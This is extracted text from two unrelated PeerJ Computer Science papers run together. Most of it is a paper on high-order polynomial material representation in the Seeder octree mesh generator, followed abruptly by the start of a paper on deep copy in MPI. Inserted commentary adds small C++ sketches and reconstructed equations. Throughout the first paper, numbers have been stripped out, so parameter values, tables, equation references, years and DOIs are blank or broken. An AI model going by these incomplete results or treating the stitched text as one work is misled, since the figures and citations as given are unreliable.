as a point of reference for the basis used throughout, a straightforward evaluation of the recurrence (5) is sketched below.
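this is a minimal, self-contained c++ sketch of the recurrence above, for illustration only; the function name is ours and is not taken from seeder.

#include <vector>

// evaluate l_0 .. l_n at a point x in [-1, 1] via the three-term recurrence (5).
std::vector<double> legendreUpTo(int n, double x) {
    std::vector<double> L(n + 1);
    L[0] = 1.0;
    if (n > 0) L[1] = x;
    for (int i = 2; i <= n; ++i)
        L[i] = ((2.0 * i - 1.0) * x * L[i - 1] - (i - 1.0) * L[i - 2]) / i;
    return L;
}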
however, before polynomials can be computed, the material distribution itself needs to be identified. namely, we need to find regions of the domain where a specific material should be present. we achieve this by selectively attaching attributes to elements in the mesh. to define which elements should be attributed and which not, we can exploit the flood filling algorithm explained above by enabling multiple fillings instead of just a single one. individual surface descriptions confine each flooding, which allows the identification of distinct regions in the mesh. by ascribing a particular material definition to each of these regions, the voxelized spatial material distribution can be obtained. this approach is similar to coloring an image, and we refer to those floodings as colors. in the following, we briefly discuss the coloring concept and then move on to the generation of high-order surface representations within the octree mesh.

coloring

seeder takes a surface triangulation along with a seed definition to construct the computational domain with non-overlapping cubical elements. the seeds are usually points, but might also be other geometrical objects, and are used as the starting point for the flood-filling algorithm. the surface description builds the confinement for the flood-filling. these two parts together are therefore building the volumetric geometry definition in the mesh.

figure chart of the overall workflow. required inputs are the surface descriptions and seeding points to start the flooding. the resulting output is the expansion of the color distribution in legendre modes for each element.

by using multiple of such pairs, it becomes possible to describe different regions within the same mesh. we refer to this as coloring, and each seed and surface needs to have a color attached to it. the flooding spreads from the seeds and is limited by surfaces of the same color. boundaries of other colors do not affect the flooding, and it is possible to have elements flooded by multiple colors. differently colored regions might, therefore, overlap. the color information is then attached to the elements and provides a method to distinguish specific areas in the mesh. afterward, the solver can associate individual material properties with given colors.

sub-resolution

with the coloring principle described above, we are now able to define arbitrary material areas, but we still need to obtain high-order surface approximations inside the elements of the octree. as this provides information beyond the resolution of the actual mesh, we refer to this as sub-resolution. figure sketches the overall workflow of the algorithm to construct this information. to obtain the sub-resolution as an expansion in legendre polynomials in each element, we need to perform the following three steps:
• voxelization (and flooding) within elements of the final mesh to identify color distributions
• evaluation of color values at integration points
• transformation of point data to polynomial modes
these three steps are indicated by a darker orange color in fig. . the other two processes are already described above. a first step creates the coarse mesh with the desired resolution, and after resolving the surfaces within the elements by the voxelization process, all elements and voxels are flood filled with colors.

the first additional step we introduce is the identification of color boundaries inside the coarse mesh elements. luckily, we already have a robust and fast method to identify color boundaries in volumes: the voxelization method described above for the mesh. we can deploy this mechanism also inside elements and recursively refine the voxels towards surfaces. the final mesh will not contain the voxels within the coarse elements but rather the polynomial approximation of the color distribution. we limit the refinement inside elements by setting the number of additional levels ℓ. this number can be freely chosen in the configuration, and all elements intersecting a boundary will be refined accordingly, independent of the size of the coarse element. we observe that even though the voxelization is only a first order approximation, it is feasible to represent the surface accurately due to the exponential nature of the bisection approach in the octree. after all voxels are known, the mesh generation algorithm proceeds with flooding as described in the previous section. the flood filling does not heed the intersected coarse elements of the final mesh.
instead, all voxels are flooded down to the finest level. with this approach, we do not require a separate algorithm for the flooding of voxels inside intersected elements. figure illustrates the mesh status after refinement and flooding for eight coarse elements intersected by a sphere. the sphere is indicated by the yellow surface and cut open to reveal the voxelization within. thick, black lines indicate the coarse mesh elements and the fine white lines show the sub-resolution voxels within them. as described above, elements in the interior of the sphere are flooded, which is indicated by the red coloring. the flooding is limited by the sphere, and all voxels outside the geometry are not flooded with this color.

two processes remain to be done at this stage: the evaluation of color values and their transformation to legendre modes. these two are hard to illustrate in three dimensions, and we will instead make use of the one-dimensional setup in fig. . it makes use of the same target step function Ξ, with the same jump location ξ, as the one in fig. , but outlines the individual numerical steps we take to arrive at an approximation of the analytical projection. vertical grid lines indicate the recursive voxelization towards the surface point. we assume the flooding to happen right of the surface, that is, the seed is at some location x > ξ. this flooding is indicated by the yellow shaded area in fig. . thus, the numerical method has to approximate a step function (6) with the given jump location ξ, illustrated in the figure by the thick red line. with eight bisections in the voxelization, this results in an approximation ξ̂ of the jump location. this state corresponds to the three-dimensional case outlined in fig. . the number of additional refinement levels ℓ determines the spatial accuracy of the surface approximation. however, this only builds one half of the numerical approximation; the other half is governed by the quality of the polynomial representation that we construct in the final two steps. the accuracy of our polynomial approximation is determined by the number of chebyshev nodes n at which the color distribution is evaluated.

figure illustration of the approximation method in 1d, for a single element and one discontinuity. the color value jumps from 0 to 1 at the jump location and is indicated by the red line. the grid lines indicate the bisection sequence and the yellow area highlights the region where the color value is identified to be 1 by the bisecting approximation. an approximant polynomial of degree is constructed from the shown chebyshev nodes (black dots). the orange polynomial shows the analytical projection with degree , also depicted in fig. .

for a given n, the chebyshev nodes are given by

x_c = cos( ((2c − 1) / (2n)) π ), c = 1, …, n. (8)

both factors, ℓ and n, can be set independently by the user. however, they both limit the accuracy of the overall approximation, and for optimal results they need to be correlated. the minimal distance between the first chebyshev node and the element boundary is proportional to n^{−2}, and the length of the smallest voxel within the element is proportional to 2^{−ℓ}. to resolve all node distances, it is, therefore, necessary to choose the number of additional levels ℓ according to

ℓ ≥ ⌈2 log₂(n)⌉. (9)

once the flooding situation of all voxels is known, we can evaluate the color at each chebyshev node. a small sketch of how the nodes (8) and the matching minimal refinement depth from (9) can be computed is given below.
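the following c++ fragment is an illustrative sketch written under the reconstruction of (8) and (9) above; the helper names are ours, not seeder's.

#include <cmath>
#include <vector>

// chebyshev nodes on [-1, 1] as in (8).
std::vector<double> chebyshevNodes(int n) {
    const double pi = std::acos(-1.0);
    std::vector<double> x(n);
    for (int c = 1; c <= n; ++c)
        x[c - 1] = std::cos((2.0 * c - 1.0) / (2.0 * n) * pi);
    return x;
}

// smallest number of additional refinement levels that still resolves the minimal
// node distance, following relation (9): l >= ceil(2 * log2(n)).
int minimalSubLevels(int n) {
    return static_cast<int>(std::ceil(2.0 * std::log2(static_cast<double>(n))));
}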
for this, numerical values need to be associated with the flooding status for each color. usually, we assume a value of 1 for flooded voxels and a value of 0 for non-flooded voxels. due to the spatial discretization by an octree, the color value at each chebyshev node x_c can be found fast, with logarithmic computational complexity. in fig. the chebyshev nodes (8) for a given n are indicated by black dots and their color value by the elevation of the dots. the approximated step function provides the color values, and we obtain

f_c = Ξ(x_c) with ξ = ξ̂, c = 1, …, n (10)

for the polynomial values at the chebyshev nodes x_c. it is notable that the position of the surface is only significant up to the interval between two neighboring nodes. a variation of the jump location within the interval between two neighboring nodes does not change the final approximation. the only option to increase the accuracy of the approximation is to use a larger number of integration points n. finally, the transformation of the nodal information (10) to a suitable function space for the solver has to be done. a typical choice for discontinuous galerkin methods is the orthogonal legendre basis. to obtain the legendre modes a_i in (7) from the values at the chebyshev nodes f_c in (10), we apply the fast polynomial transformation proposed in alpert & rokhlin ( ). however, other target functions with different point sets could also be plugged into the described machinery. the obtained polynomial recovers the function values f_c at the nodes exactly and is drawn in fig. by the black line running through all dots. due to the discontinuity of the step function, the representation in polynomial space is an infinite series. the finite approximation suffers from the gibbs phenomenon (wilbraham, ). however, besides this fundamental problem, inaccuracies due to the numerical integration can also be seen, as the numerical (black) and the analytical (orange) projections do not coincide in fig. . these result in a distorted location of the jump. in the next section, we will have a closer look at these numerical issues. with this step, we now have a volumetric description that yields a high-order approximation of the surface. note that only intersected coarse mesh elements need to get this information added; all other elements have constant colors. thus, the need for volume information is limited to a small area at the surface.

numerical properties

in this section, we investigate the numerical properties of the described approximation method. though the one-dimensional problem with a single jump is much simpler than a real three-dimensional geometry, it is still instructive for the fundamental properties of the algorithm. let us recall that the goal is an appropriate representation of the geometry in a high-order discontinuous galerkin solver. typically, the deployed functions in the solver are smooth within elements. here we consider specifically legendre polynomials, which are attractive due to their orthogonality. the representation of a non-smooth material distribution in the finite smooth function space, therefore, can only be approximate. table shows the convergence behavior for the series of legendre polynomials, obtained by l2 projections of the step function with jump location ξ in the interval [−1, 1]. for the one-dimensional step function, these reference coefficients can also be written in closed form; an illustrative sketch is given below.
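assuming the step function (6) and expansion (7) as reconstructed above, the l2-projection coefficients follow from the standard identity (2i + 1) l_i(x) = d/dx [l_{i+1}(x) − l_{i−1}(x)], giving a_0 = (1 − ξ)/2 and a_i = (l_{i−1}(ξ) − l_{i+1}(ξ))/2 for i ≥ 1. the c++ fragment below is a small illustrative sketch of this closed form and is not part of seeder.

#include <vector>

// analytic legendre expansion coefficients a_0 .. a_n of the step function (6)
// with jump location xi, i.e. the reference l2 projection.
std::vector<double> stepProjection(int n, double xi) {
    std::vector<double> L(n + 2), a(n + 1);
    L[0] = 1.0;
    L[1] = xi;
    for (int i = 2; i <= n + 1; ++i)                 // recurrence (5) evaluated at x = xi
        L[i] = ((2.0 * i - 1.0) * xi * L[i - 1] - (i - 1.0) * L[i - 2]) / i;
    a[0] = 0.5 * (1.0 - xi);
    for (int i = 1; i <= n; ++i)
        a[i] = 0.5 * (L[i - 1] - L[i + 1]);
    return a;
}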
table the convergence of the series of legendre polynomials towards the step function (degree versus l2-error).

a slow convergence can be observed, which is well known for high-order approximations of discontinuous functions. however, the error outside a small band around the discontinuity can be improved later on by a post-processing step, as shown in gottlieb & hesthaven ( ). the error is bound to this band around the discontinuity, and the width of that band decreases with the number of degrees of freedom. while we can compute this analytic projection for the simple setup with a single discontinuity in one dimension, this is not possible anymore for multiple dimensions and more complex geometries. thus, we need the previously described numerical approach to approximate the projection. in the following, we first analyze how well the numerical scheme recovers the optimal solution given by the l2 projection for the simple one-dimensional discontinuity. figure shows the convergence of the numerical procedure towards the analytical projection onto a polynomial space with a maximal degree of . plotted is the error over the spatial resolution, where the spatial resolution is given by the number of chebyshev nodes used for the numerical integration. the difference in terms of the l2 norm to the analytical projection is represented by the blue line and covers all modes of the polynomial. with the red line, the absolute difference in the volume is provided. note that the volume equals the first mode of the legendre expansion and is thus easily obtained. nevertheless, the two curves show a similar behavior, and the volume error can be used as a good indicator of the qualitative behavior of this numerical approximation. apparently, the error does not converge uniformly, but on average we observe a convergence rate of roughly . this error is comparable to the one due to the voxelization, and so these two resolutions (number of voxels and number of integration points) should be in the same range.

figure error convergence of the numerical approximation towards the analytical projection for a polynomial of degree . the blue line shows the l2-error over all modes while the red line shows the absolute error in the first mode, which represents the volume. on average, a convergence rate of is achieved. keep in mind that in comparison to the actual step function, the error from table always remains.

to investigate the mechanism in 3d, we look at three different geometrical objects: a sphere, a cube, and a tetrahedron. in each case the overall domain is a cubical box [− , ] × [− , ] × [− , ] subdivided by cubical elements. the sphere is put in the middle of the domain, with its center at ( , , ), and has a radius of . similarly, the cube has an edge length of , and its barycenter is placed at the center of the domain at ( , , ). as a third basic geometry, the tetrahedron again is similarly defined with its barycenter in the center of the domain and an edge length of . the error in the volume approximation is used to assess the quality of the polynomial representation. figure plots this measure for the sphere over the two available parameters, voxelization resolution and numerical integration points.
it can be observed that the error is mostly bounded by either one of the parameters and for a minimal computational effort it indeed is necessary to change them according to the relation ( ). figure illustrates the projection of the sphere on a d polynomial representation in the eight elements of the mesh. from a to d it shows improved accuracies. in yellow the isosurface of a color value of . is shown and in comparison the half of the reference sphere is shown in blue. figure a shows the sphere embedded in the eight elements, indicated by the black wireframe. in this, a very rough estimation of the sphere is shown with a polynomial of degree and a low voxelization resolution. clearly, the staircases from the voxelization are visible in the polynomial representation here. the next image in b shows a zoom in for finer voxelization, but still a polynomial degree of , in the left half the reference sphere is again depicted in blue. while the finer resolution in the voxelization yields a better approximation now, there are relatively strong oscillations visible, especially close to the element boundaries. to allow for a better representation of the sphere we move klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure error in the volume approximation for a sphere with a radius of . the mesh consists of elements with a common vertex in the center of the sphere. figure illustration of sphere approximations, with increasing accuracy. the sphere is blue, and the isosurface of the color value at . is yellow. in (a), the sphere is shown in the embedding domain with the elements. voxelization and integration points increase from (a) to (d). to a polynomial degree of in fig. c. the voxelization is chosen with an appropriate resolution, in this case, but the numerical integration results in aliasing issues, exhibiting a staircase-like effect for the isosurface of the polynomial. finally, in the fig. d, we see the impact of a higher number of points for the numerical integration, resulting in a much smoother geometry for the shown polynomial of degree . figure illustrates the approximation of a cube. all images show the isosurface for polynomial representation of degree , but the accuracy of the numerical approximation increases from left to right. the number of integration points increases from in fig. a over and to in fig. d and the voxelization is chosen according to eq. ( ). edges and corners get smoothed out, but we observe only little oscillations for this simple, axis aligned, geometry. klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure representation of the cube in elements with polynomials of degree . from (a) to (d) an increasing number of integration points is used. image (d) shows the cube with the elements of the mesh. the reference geometry is drawn in blue, and the isosurface of the color value . in yellow. we cut the reference in the middle to enable a better view for the comparison, except for image (b) where it is the other way around, and the isosurface is cut. figure approximation of the tetrahedron with an increasing polynomial degree from (a) to (d). starting in (a) with a polynomial degree of and increasing over and to in image (d). shown is the isosurface of the polynomial at a value of . in yellow and for comparison the reference geometry cut in half with a blue coloring. finally, fig. 
depicts a study on the d polynomial approximation of a tetrahedron. the maximal polynomial degree increases from up to , and twice as many integration points as polynomial modes are used in each approximation. we observe that the sharp edges and corners are smoothed out at low orders but are increasingly well recovered in the higher resolved polynomials. also, oscillations in the planes of the tetrahedron get smaller in amplitude. with a polynomial of degree , the original shape is well captured. this shows that a high-order polynomial can nicely be constructed, even for objects with sharp corners and edges. figure shows the application of the described method to a more complex geometry. depicted is in yellow the isosurface of a polynomial approximating a porous medium, described by a triangulation in an stl file shown in dark blue. this geometry features small bridges and holes. those are well recovered by the polynomial approximation; only the edges get a little bit smoothed out. keep in mind, that we are only using cubical elements, which can be exploited by the numerical scheme. also, no bad elements arise resulting in an extremely robust mesh generation. application in dgfem for electrodynamics to show the behavior of the obtained geometry, we look at an electrodynamic setting, governed by eqs. ( )–( ), and solve it with a high-order, modal dgfem. for time integration, a classical explicit fourth order runge–kutta integration is deployed. the klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure isosurface of a porous medium (yellow) in comparison to the original stl data (blue). the geometry is well recovered; only edges are smoothed out a little. simulation setup is an infinite cylinder, impinged by a planar wave. in this setting, the scattering of the wave can be described by a mie series (mie, ), which we use as the reference solution. our simulation setup has the following parameters: • permittivity and permeability in the surrounding: εs = µs = • permittivity and permeability in the cylinder: εc = µc = • simulated domain: [− , ] × [− , ] × [ , . ] • radius of the cylinder r = . • center of the cylinder: ( . , . ) • the impinging planar wave has a wave length of λ = . the domain is discretized with × × = elements, and polynomials with a maximal polynomial degree of are used to represent the solution in each element. for the initial condition of the numerical simulation, we also employ the mie series. we compare the numerical result with the reference solution after the impinging wave has traveled once by the diameter of the cylinder. in fig. a the instanteneous exact solution for the z-component of the displacement field d = εe is shown. right to this reference solution, the difference between the numerical solution and this reference after a simulation time of . is depicted in fig. b. we use a range in ± % of the maximal amplitude in the exact solution for the scale of the difference. a de-aliasing is applied in the numerical scheme here. thus, while the scheme uses modes per direction to represent the solution, we use twice as many modes ( ) to compute the multiplication of the material distribution with the solution. in the numerical simulation, no voxelization is employed. instead, the exact definition of the cylinder is used to determine the material values at the chebyshev nodes per direction that are used to construct the polynomials with a maximal polynomial degree of . 
this corresponds to ℓ = ∞ with aa = in table . as can be seen, the reference solution is recovered quite accurately in the largest part of the domain. only close to the actual interface, there are larger deviations observed. please note that no smoothening post-processing was applied here, and all gibbs oscillations are visible in the deviations. we now replace the exact definition of the cylindrical geometry by the polynomial representation obtained by the method described above. all other parameters of the numerical setup remain the same. for all simulations, the cylinder geometry is klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure scattering of a planar wave at a cylindrical object. the grid lines indicate the mesh of the dgfem solver. for the numerical solution, a basis with a maximal polynomial degree of is used. in (a), the reference solution is shown. in (b), the difference between the numerical solution and the reference can be seen for a de-aliasing by points. the color scale for the difference is chosen with a range of ± % of the maximal amplitude in the reference. table l -error in the mie scattering simulation after a simulation time of . for different geome- try approximations. simulations were done with a spatial order of . the polynomial representation of the geometry uses a maximal polynomial degree of . for the time integration, a classical explicit fourth order runge–kutta scheme is used. ℓ aa = aa = aa = . e– . e– . e– . e– . e– . e– . e– . e– . e– . e– . e– . e– ∞ . e- approximated by polynomials with a maximal polynomial degree of in each element. similarly to fig. , we can vary the number of integration points and the size of the smallest voxels in each element for the construction of these polynomials. to judge the quality of the thereby obtained cylinder approximations for the dgfem scheme, we build the l -error across the × elements enclosing the cylinder. for the comparison, we consider the instantaneous solution after simulating a time interval of . (the time it takes the impinging wave to move once by the diameter of the cylinder). the errors are measured in the z component of the displacement field d and are shown in table . we increase the voxel resolution (ℓ) from row to row in table . in the columns we increase the anti-aliasing, that is the number of chebyshev nodes to construct the polyno- mials of degree . the aa factor is to be understood as a multiplicator, such that with aa = we use points per direction to construct the polynomials and with aa = we use . klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. as can be seen in table , the error always improves with the voxel resolution ℓ. a higher anti-aliasing, however, does not always improve the solution quality. this behavior matches the observations in fig. and emphasizes the necessity for voxel resolutions that resolve the smallest distances between chebyshev nodes. summary and outlook seeder is a mesh generating tool providing an octree representation with cubical elements to a solver. we enhanced these cubical elements in this work by polynomial representations of material distributions within each element. to obtain these polynomials, we employ a first order voxelization utilizing the octree refinement strategy with a colored flood filling to identify the material distribution. 
numerical integration then transforms those detailed material distributions into multi-dimensional legendre polynomials. this approach is highly robust and applicable to complex geometries. it does not impose strong requirements on the quality of the surface description. we have demonstrated that the proposed method indeed converges towards the optimal l projection of the nonsmooth target function onto the polynomial function space. the obtained geometry representation is suitable for high-order dgfem solvers as we have shown in a small analysis for the scattering of a planar electromagnetic wave at a cylindrical obstacle. a possible improvement to the current staircase representation of the surface could be achieved by computing an approximate plane for the geometry within intersected voxels. while such a computation would introduce additional complexity and potentially expensive computations, it would reduce the number of voxels required to resolve the shortest distances between integration nodes. nevertheless, the simple voxelization scheme currently deployed is already capable of discretizing large and complex settings and has been successfully used for highly detailed simulations. a general argument against high-order methods for scenarios with nonsmooth solutions is the bad convergence as given in table . however, this can be overcome by an appropriate post-processing. in zudrop & hesthaven ( ) it is proven that high-order information can be recovered from solutions suffering from gibbs oscillations. such a post-processing step only needs to be applied to the final simulation result and has not been covered here. we believe the described geometry generation method enlarges the applicability of high-order methods to many settings with non-trivial geometries. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. author contributions • harald g. klimach wrote the paper, prepared figures and tables, performed the computation work, reviewed drafts of the paper. • jens zudrop performed the computation work, reviewed drafts of the paper. • sabine p. roller wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: bitbucket: https://bitbucket.org/apesteam/seeder. references alpert bk, rokhlin v. . a fast algorithm for the evaluation of legendre expansions. siam journal on scientific and statistical computing ( ): – doi . / . bueno-orovio a, pérez-garcı́a vm, fenton fh. . spectral methods for partial differential equations in irregular domains: the spectral smoothed boundary method. siam journal on scientific computing ( ): – doi . / . gottlieb d, hesthaven j. . spectral methods for hyperbolic problems. numerical analysis . vol. vii: partial differential equations, journal of computational and applied mathematics ( – ): – . doi . /s - ( ) - . harlacher df, hasert m, klimach h, zimny s, roller s. . tree based voxelization of stl data. in: resch m, wang x, bez w, focht e, kobayashi h, roller s, eds. high performance computing on vector systems . berlin heidelberg: springer, – . hesthaven js, warburton t. . nodal discontinuous galerkin methods: algorithms, analysis, and applications. st edition. new york: springer, doi . / - - - - . hindenlang f, bolemann t, munz c-d. . 
mesh curving techniques for high order discontinuous galerkin simulations. in: kroll n, hirsch c, bassi f, johnston c, hillewaert k, eds. idihom: industrialization of high-order methods—a top-down approach: results of a collaborative research project funded by the european union. notes on numerical fluid mechanics and multidisciplinary design. cham: springer international publishing.
ishida t, takahashi s, nakahashi k. efficient and robust cartesian mesh generation for building-cube method. journal of computational science and technology, doi . /jcst.
klimach h, masilamani k, harlacher d, hasert m. seeder. available at https://bitbucket.org/apesteam/seeder (accessed june).
mie g. beiträge zur optik trüber medien, speziell kolloidaler metallösungen. annalen der physik, doi . /andp.
mittal r, iaccarino g. immersed boundary methods. annual review of fluid mechanics, doi . /annurev.fluid.
peskin cs. the immersed boundary method. acta numerica.
sabetghadam f, sharafatmandjoor s, norouzi f. fourier spectral embedded boundary solution of the poisson's and laplace equations with dirichlet boundary conditions. journal of computational physics, doi . /j.jcp.
white e. what is an stl file? available at http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file (accessed june).
wilbraham h. on a certain periodic function. the cambridge and dublin mathematical journal.
yerry ma, shephard ms.
automatic three-dimensional mesh generation by the modified-octree technique. international journal for numerical methods in engineering, doi . /nme.
zudrop j, hesthaven js. accuracy of high order and spectral methods for hyperbolic conservation laws with discontinuous solutions. siam journal on numerical analysis.
implementing generalized deep-copy in mpi

joss whittle, rita borgo and mark w. jones. department of computer science, swansea university, swansea, united kingdom; informatics department, king's college london, london, united kingdom. these authors contributed equally to this work.

abstract

in this paper, we introduce a framework for implementing deep copy on top of mpi. the process is initiated by passing just the root object of the dynamic data structure. our framework takes care of all pointer traversal, communication, copying and reconstruction on receiving nodes. the benefit of our approach is that mpi users can deep copy complex dynamic data structures without the need to write bespoke communication or serialize/deserialize methods for each object. these methods can present a challenging implementation problem that can quickly become unwieldy to maintain when working with complex structured data. this paper demonstrates our generic implementation, which encapsulates both approaches. we analyze the approach with a variety of structures (trees, graphs (including complete graphs) and rings) and demonstrate that it performs comparably to hand written implementations, using a vastly simplified programming interface. we make the source code available completely as a convenient header file.
subjects computer networks and communications, distributed and parallel computing, programming languages
keywords mpi extension library, deep copy, serialization, marshalling, dynamic data structures, deserialization, unmarshalling
corresponding author mark w. jones, m.w.jones@swansea.ac.uk. academic editor srikumar venugopal. submitted july, accepted october, published november. doi . /peerj-cs. copyright whittle et al., distributed under creative commons cc-by.

introduction

message passing is an established communication paradigm for both synchronous and asynchronous communication in distributed or parallel systems. using mpi with object orientation is not always an easy task: while control over memory locality and data distribution represents an extremely valuable feature, dealing with the ever growing and sophisticated features of oo languages can be cumbersome. this problem is particularly challenging for data structures employing abstractions (e.g., inheritance and polymorphism) and pointer indirection, since transferring these data structures between disjoint hosts requires deep copy semantics. for user defined objects mpi adopts shallow copy semantics, whereby default copy constructors and assignment operators perform shallow copies of the object, leaving memory allocation, copy, and de-allocation to be the responsibility of the programmer, not the implementation. a similar policy is applied to mpi objects, represented as handles to opaque data that cannot be directly copied. copy constructors and assignment operators in user defined objects that contain an mpi handle must either invoke the appropriate mpi function to copy the opaque data (deep copy) or use a reference counting scheme that will provide references to the handle (reference counted shallow copy). shallow copy is acceptable for shared-memory programming models where it is always legal to dereference a pointer, with the underlying assumption that the target of member pointers will be shared among all copies. users often require deep copy semantics, as illustrated in fig. , where every object in a data structure is transferred. deep copy requires recursively traversing pointer members in a data structure, transferring all disjoint memory locations, and translating the pointers to refer to the appropriate device location. this is also referred to as object serialization or marshalling, commonly used for sending complex data structures across networks or writing to disk. mpi has basic support for describing the layout of user defined data types and sending user-defined objects between processes (message passing interface forum, ). the directives we propose provide a mechanism to shape and abstract deep copy semantics for mpi programs written in c++. to make the problem concrete, the sketch below shows the kind of hand-written, per-node transfer that such directives are intended to replace.
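the following c++ fragment is an illustrative sketch of a hand-coded deep copy of a singly linked list using only standard mpi point-to-point calls; the struct and function names are ours and are not part of mel.

#include <mpi.h>

struct Node { int value; Node* next; };

void deepSendList(const Node* head, int dest, MPI_Comm comm) {
    int count = 0;
    for (const Node* n = head; n != nullptr; n = n->next) ++count;
    MPI_Send(&count, 1, MPI_INT, dest, 0, comm);            // how many nodes follow
    for (const Node* n = head; n != nullptr; n = n->next)
        MPI_Send(&n->value, 1, MPI_INT, dest, 1, comm);     // payload, node by node
}

Node* deepRecvList(int src, MPI_Comm comm) {
    int count = 0;
    MPI_Recv(&count, 1, MPI_INT, src, 0, comm, MPI_STATUS_IGNORE);
    Node* head = nullptr;
    Node** tail = &head;
    for (int i = 0; i < count; ++i) {
        Node* n = new Node{0, nullptr};
        MPI_Recv(&n->value, 1, MPI_INT, src, 1, comm, MPI_STATUS_IGNORE);
        *tail = n;                                          // pointers are rebuilt locally
        tail = &n->next;
    }
    return head;
}

even for this trivial structure, the programmer must count, traverse, transfer, and relink by hand; for trees, graphs, or cyclic structures the bookkeeping grows quickly, which is exactly the burden the directive-based approach aims to remove.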
along with elegantly solving the deep copy problem, this mechanism also reduces the level of difficulty for the programmer, who only needs to express the dependencies of an object type, rather than explicitly programming how and when to move the memory behind pointers. as a motivating example, we show that comparable performance can be achieved when using a simple and generic algorithm to implement deep copy compared to hand coded native mpi implementations. the main contributions of this work are:
• we introduce the mpi extension library (mel), a c++ header-only wrapper around the mpi standard which aims to give a simplified programming interface with consistent type-safety and compile time error handling, along with providing efficient implementations of higher level parallel constructs such as deep copy.
• as a part of mel, we provide generic implementations of deep copy semantics that can be easily applied to existing code to enable complex structured data to be deep copied transparently as either a send, receive, broadcast, or file access operation with minimal programmer intervention. the latter can also be used for the purpose of check-pointing when writing fault tolerant mpi code.

figure an example of a structure that requires deep copy semantics. arrows represent pointer traversals to disjoint regions of memory.

related work

message passing as a style of parallel programming enables easy abstraction and code composition of complex inter-process communications. existing mpi interfacing libraries (mccandless, squyres & lumsdaine, ; huang et al., ; boost-community, ) by default rely on the underlying standard shallow copy principle, where data contains no dependencies on memory outside the region directly being copied, and where dependencies do exist, they must be explicitly resolved by the programmer using subsequent shallow copies. however, this simplified model of communication comes at the cost of having to structure computations that require inter-process communication using low-level building blocks, which often leads to complex and verbose implementations (friedley et al., ). similar systems, such as the generic message passing framework (lee & lumsdaine, ), resolve pointers to objects, but do not follow dynamic pointers (data structure traversal) to copy complete complex dynamic structures possibly containing cycles. mpi works on the principle that nothing is shared between processes unless it is explicitly transported by the programmer. these semantics simplify reasoning about the program's state (hoefler & snir, ) and avoid complex problems that are often encountered in shared-memory programming models (lee, ), where automatic memory synchronization becomes a significant bottleneck. autolink and automap (goujon et al., ) work together to provide similar functionality. automap creates objects at the receiver. autolink tags pointers to determine whether they have been visited or not during traversal. the user must place directives in their code and carry out an additional compilation step to create intermediate files for further compilation. extended mpicc (renault, ) is a c library that converts user-defined data types to mpi data types, and also requires an additional compilation. it can automate the process, but in some cases also requires user input to direct the process. tansey & tilevich ( ) also demonstrate a method to derive mpi data types and capture user interaction via a gui to direct the marshalling process. the autoserial library (gna, ) gives a c++ interface for performing serialization to file as binary or xml, or to a raw network socket as binary data. their library also offers a set of convenience functions for buffering data to a contiguous array with mpi communications to move the data. their method makes extensive use of pre-processor macros to generate boilerplate code needed for deep traversal of objects. for mpi, this
tansey & tilevich ( ) also demonstrate a method to derive mpi data types and capture user interaction via a gui to direct the marshalling process. autoserial library (gna, ) gives a c++ interface for performing serialization to file as binary or xml; or to a raw network socket as binary data. their library also offers a set of convenience functions for buffering data to a contiguous array with mpi communications to move the data. their method makes extensive use of pre-processor macros to generate boilerplate code needed for deep traversal of objects. for mpi, this whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ library only handles the use case of fully buffered deep copy in the context of mpi_send and mpi_recv communications. openacc (beyer, oehmke & sandoval, ) tackles the deep copy problem in the context of transferring structured data from host machines to on node hardware such as gpus and accelerators. their approach is based on a compiler implemented #pragma notation similar to openmp while our method is implemented as a header only template library. tpo++ (grundmann, ritt & rosenstiel, ) requires serialize and deserialize functions to be defined. the paper highlights good design goals which we also follow in this work. compared to the above approaches, we place much lighter requirements on the user and do not require additional signposting (usually implemented as preprocessor macros wrapped around variable declarations) that other methods require. we do not require an additional compilation step or gui compared to the above as will be demonstrated in the following sections. we also provide an analysis of our approach. we explicitly demonstrate and analyze our approach on a wide variety of complex dynamic data structures. our analysis shows that our approach has low time and memory overhead and also requires less user direction to achieve deep copy. it provides this extra functionality at no loss of performance over hand coded approaches. we avoid the in place serialize that some approaches utilize, resulting in our approach having a low memory overhead. we also evaluate our methods in comparison to boost serialization library (cogswell, ) and demonstrate that boost introduces a performance penalty which our method avoids. boost also requires more intervention from the user/programmer to achieve the same capability. therefore, the main benefit of our approach over others is that it is a true deep copy approach where the user only has to pass in the root object/node of the data structure. in charm++ (kale & krishnan, ; miller, ) messages are by default passed by value, however charm++ provides support for deep copy via definition of serialization methods for non-contiguous data structures. it is a user task to define the proper serialization methods including the explicit definition of memory movement and copy operations. if the serialization methods are implemented correctly for a user-defined type, a deep copy will be made of the data being serialized. charm++ distinguishes between shared-memory and distributed-memory scenarios, where shared-memory data within a node can be directly passed by pointer. the programmer must explicitly specify the policy to be adopted by indicating if the data should be conditionally packed or not. conditionally packed data are put into a message only when the data leaves the node. 
